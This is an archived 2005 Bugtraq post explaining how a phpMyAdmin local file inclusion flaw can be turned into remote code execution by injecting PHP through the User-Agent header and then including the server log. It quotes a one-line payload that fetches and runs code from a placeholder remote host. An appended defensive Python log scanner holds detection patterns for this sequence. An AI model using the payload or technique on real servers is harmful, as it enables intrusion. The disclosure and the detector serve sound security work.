Re: [SECURITYREASON.COM] phpMyAdmin Local file inclusion 2.6.4-pl1

From: Andreas Zeidler (az_at_zitc.de)
Date: 10/12/05

    Date: Wed, 12 Oct 2005 21:23:37 +0200
    To: Bugtraq <bugtraq@securityfocus.com>
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    On Mon, Oct 10 16:11, Maksymilian Arciemowicz <max@jestsuper.pl> wrote:
    > - --- 0.Description ---
    > phpMyAdmin 2.6.4 is a tool written in PHP intended to
    > handle the administration of MySQL over the Web.
    > [...]
    > phpMyAdmin is a very dangerous script.
    >
    > - --- 1. Local file inclusion (Critical) ---
    > File: ./libraries/grab_globals.lib.php

    hi again,

    since my post yesterday apparently had some trouble being delivered
    because of a "suspicious attachment" (my pgp sig :)) i thought i'd
    send it again. and this time even as a reply to the right message... :)

    in case you already got this, sorry for bothering twice,

    andi

    - ----- quote on ---------------------------------------------------------
    this is a comment on the recent phpmyadmin vulnerability[1] discovered
    by maksymilian arciemowicz. i didn't really know where to post this,
    so i hope this is the right place.

    anyway, since i've used a file inclusion vulnerability in an older
    version of phpmyadmin as a starting point for a security analysis last
    weekend, and came up with a rather simple idea of how to use it for
    unprivileged script execution of remote php code, i thought i'd post
    this here. actually i think this method could be used on any php-based
    local include vuln, so i was wondering why i couldn't yet find anything
    about it on the net...

    okay, the problem with local file vulns is of course, that the contents
    of the file being read are not evaluated. but given php's include
    statement they are -- if they contain a valid php statement. now instead
    of trying to upload a file containing php code (which wasn't possible in
    my case), i asked myself if there was a way to use the server to create it
    for me?

    the idea that hit me before falling asleep was to send the code i needed
    (like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the user
    agent string, this way having the web server write it into a file for
    me, and in a second step simply use the already existent local file vuln
    to read the server's log file and this way execute the code.

    of course this method doesn't always work. php mustn't run in safe
    mode, the web server has to log user agent strings and the log files
    must be accessible after privileges have been dropped. since most
    people are logging in combined format, i guess the last requirement is
    the most critical one, but many logs are world-readable nevertheless.
    also, enabled url-based includes make things easier, but they're not
    strictly necessary.

    so, provided with a php local file vuln and readable log files,
    executing arbitrary commands comes down to locating a suitable log file
    to include. with a little guessing and the ability to read files (i.e.
    the server configuration) this is not too difficult.

    that's it. any comments and feedback about this is most welcome,
    especially since this approach seems much too simple to not have been
    used before. maybe someone can just point me to an already existing
    discussion about this... :)

    [1] http://www.securityfocus.com/bid/15053
    - ----- quote off --------------------------------------------------------

    - --
    zeidler it consulting - http://zitc.de/ - info@zitc.de
    karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
    keine softwarepatente in europa! - http://noepatents.eu.org/
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.1 (GNU/Linux)

    iD8DBQFDTWK5V41LSDEbSrkRArkyAKCMW/Wg9XZ5BErRujvN5sjhXVeTfgCgl/Sx
    CUrBPEZ35UWqjxofn9Pj9hQ=
    =qJYs
    -----END PGP SIGNATURE-----
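
A defender-side check for the two-step pattern described in the message above, as an added example that is not part of the original post: it scans combined-format access log lines for PHP open tags in client-controlled fields and for query strings that point at log files. The sample lines, the `f` parameter, the paths and the matching rules are constructed for illustration.

```python
import re
from urllib.parse import unquote

# "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
PHP_TAG = re.compile(r'<\?(?:php|=|\s)', re.I)  # PHP open tag written into a logged field
LOG_REF = re.compile(r'(?:\.\./|/var/log/|access[._]log|error[._]log)', re.I)

def decode(value):
    """Undo up to two rounds of URL encoding so %3C%3Fphp is seen as <?php."""
    for _ in range(2):
        value = unquote(value)
    return value

def scan(lines):
    """Return (line_no, host, finding) for every suspicious entry."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = COMBINED.match(line.rstrip("\n"))
        if not m:
            findings.append((no, None, "unparseable"))  # malformed lines deserve a look too
            continue
        for field in ("request", "referer", "agent"):
            if PHP_TAG.search(decode(m[field])):
                findings.append((no, m["host"], f"php-tag-in-{field}"))
        # Second step of the pattern: a parameter value that points at a log file.
        query = m["request"].partition("?")[2]
        if LOG_REF.search(decode(query)):
            findings.append((no, m["host"], "log-path-in-query"))
    return findings

# Constructed sample lines (documentation addresses, hypothetical paths and parameter).
SAMPLE = [
    '192.0.2.10 - - [12/Oct/2005:21:00:01 +0200] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [12/Oct/2005:21:00:07 +0200] "GET / HTTP/1.1" 200 512 "-" "<?php /* marker */ ?>"',
    '192.0.2.66 - - [12/Oct/2005:21:00:09 +0200] "GET /page.php?f=..%2F..%2Flogs%2Faccess_log HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `php-tag-in-agent` hit followed by `log-path-in-query` from the same host is the two-step sequence the post describes. Keeping log files unreadable to the account PHP runs under removes the precondition the author calls the most critical one.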

